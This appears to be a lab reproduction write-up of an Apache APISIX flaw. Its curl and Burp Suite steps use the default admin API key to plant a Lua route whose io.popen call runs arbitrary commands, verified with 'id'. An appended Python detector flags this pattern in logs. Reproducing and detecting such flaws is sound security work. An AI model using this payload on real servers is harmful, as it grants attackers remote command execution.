After the environment starts, visit http://your-ip:9080; you should see the default 404 page, which confirms the environment is running normally.
This vulnerability uses the default Token to add a malicious route.
Using the default administrator Token (edd1c9f034335f136f87ad84b625c8f1), send a POST request to the admin interface to add a route that contains a malicious Lua script.
Method 1:
curl -X POST "http://192.168.75.132:9080/apisix/admin/routes" -H "X-API-KEY: edd1c9f034335f136f87ad84b625c8f1" -H "Content-Type: application/json" -d '{"uri":"/attack","script":"local _M = {} \n function _M.access(conf, ctx) \n local os = require(\"os\")\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, \"r\"))\n local s = assert(f:read(\"*a\"))\n ngx.say(s)\n f:close() \n end \nreturn _M","upstream":{"type":"roundrobin","nodes":{"example.com:80":1}}}'
The malicious script is injected through the script parameter: io.popen(args.cmd, 'r') executes the system command passed in the cmd parameter, and ngx.say(s) returns the command output in the response.
Execute an arbitrary command to verify the vulnerability:
curl "http://192.168.75.132:9080/attack?cmd=id"
Method 2:
Use Burp Suite (bp) to send the POST request.
Go to the Proxy module and turn on Intercept.
Visit any URL in the browser; bp will intercept the request.
In Burp's "Intercept" panel, change the request method from GET to POST and change the request path to the target interface:
POST /apisix/admin/routes HTTP/1.1
Below the request line, add the required request headers, including the X-API-KEY and Content-Type needed for the exploit:
Host: 192.168.75.132:9080
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: */*
Then add the JSON request body:
{"uri": "/attack","script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M","upstream": {"type": "roundrobin","nodes": {"example.com:80": 1}}}
After clicking Forward to send the request, switch to the "HTTP history" tab.
Find the request that was just sent and check the response. If the returned JSON contains {"action":"create"}, the POST request succeeded.
The vulnerability has been reproduced successfully!!!
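As an added defensive example (not part of the original writeup), the following Python flags Admin API requests that present the default key shown in the steps above, or that create a route whose inline script calls io.popen or os.execute. The JSON-lines records are constructed and assume a proxy or WAF log that captures request headers and body, which the stock APISIX access log does not.

```python
import json

# Default Admin API key quoted in the writeup above; any request presenting it
# means the key was never rotated.
DEFAULT_ADMIN_KEY = "edd1c9f034335f136f87ad84b625c8f1"
ADMIN_PREFIX = "/apisix/admin/"
# Lua calls in a route script that hand control to the operating system.
OS_CALLS = ("io.popen", "os.execute")

def inspect_request(rec):
    """Return findings for one request record (dict with method, path,
    headers, body). An empty list means nothing suspicious was seen."""
    findings = []
    if not rec.get("path", "").startswith(ADMIN_PREFIX):
        return findings  # only the Admin API is of interest here
    headers = {k.lower(): v for k, v in rec.get("headers", {}).items()}
    if headers.get("x-api-key") == DEFAULT_ADMIN_KEY:
        findings.append("default admin key used")
    if rec.get("method") in ("POST", "PUT", "PATCH"):
        try:
            body = json.loads(rec.get("body") or "{}")
        except json.JSONDecodeError:
            body = {}
        script = body.get("script") if isinstance(body, dict) else None
        if isinstance(script, str):
            findings.append("route created with inline Lua script")
            if any(call in script for call in OS_CALLS):
                findings.append("script spawns OS commands")
    return findings

def scan(lines):
    """Parse JSON-lines request records and return (path, findings) for each
    record that produced at least one finding."""
    hits = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        findings = inspect_request(rec)
        if findings:
            hits.append((rec["path"], findings))
    return hits

# Constructed sample records (not real traffic); assumes a proxy or WAF log
# that records headers and request body as JSON lines.
SAMPLE_LOG = """
{"method":"POST","path":"/apisix/admin/routes","headers":{"X-API-KEY":"edd1c9f034335f136f87ad84b625c8f1","Content-Type":"application/json"},"body":"{\\"uri\\":\\"/attack\\",\\"script\\":\\"local f = io.popen(args.cmd)\\"}"}
{"method":"GET","path":"/apisix/admin/routes","headers":{"X-API-KEY":"rotated-key-0001"},"body":""}
{"method":"GET","path":"/attack?cmd=id","headers":{},"body":""}
"""

if __name__ == "__main__":
    for path, findings in scan(SAMPLE_LOG):
        print(path, "->", "; ".join(findings))
```

The first record, which mirrors the route-creation request in the writeup, is the only one flagged; a request with a rotated key and a request to the proxied route itself produce no findings.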